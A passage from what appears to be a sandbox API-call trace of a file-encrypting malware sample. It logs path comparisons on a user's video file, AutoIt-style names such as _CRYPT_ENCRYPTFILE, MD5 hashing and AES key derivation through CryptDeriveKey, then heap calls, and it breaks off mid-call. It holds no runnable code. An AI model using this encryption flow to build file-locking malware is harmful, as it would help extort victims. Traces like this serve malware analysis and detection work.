dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ffd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fd495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="495B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="95B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eqP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qP\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sw3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.063] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w3Tjl.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0193.063] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.063] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0193.063] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0193.063] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0193.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0193.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0193.064] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0193.064] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0193.064] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0193.064] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0193.064] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.064] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff468790, ftCreationTime.dwHighDateTime=0x1d5dfb3, ftLastAccessTime.dwLowDateTime=0xdf92db70, ftLastAccessTime.dwHighDateTime=0x1d5d9d6, ftLastWriteTime.dwLowDateTime=0xdf92db70, ftLastWriteTime.dwHighDateTime=0x1d5d9d6, nFileSizeHigh=0x0, nFileSizeLow=0x6ccb, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="sw3Tjl.mkv", cAlternateFileName="")) returned 0x90af58 [0193.064] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0193.064] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.064] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0193.064] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.065] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0193.065] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.065] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0193.065] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.065] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0193.065] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.065] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.065] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.065] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.065] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0193.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.065] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0193.067] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.067] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.067] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0193.067] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.067] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.067] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.067] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.067] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.067] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0193.067] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.067] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.067] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.067] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.067] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.067] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.067] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0193.068] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.068] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.068] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0193.068] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.068] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.068] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0193.068] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.068] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.068] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0193.068] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.068] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.068] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.068] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.068] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.068] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.068] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.068] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0193.068] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.068] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.069] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0193.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.069] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0193.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.069] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.069] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.069] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0193.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.069] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.069] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.070] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0193.070] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.070] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0193.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0193.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0193.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0193.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0193.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0193.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0193.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0193.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0193.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0193.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0193.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0193.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0193.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0193.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0193.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0193.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0193.071] HeapFree (in: hHeap=0x8a0000, 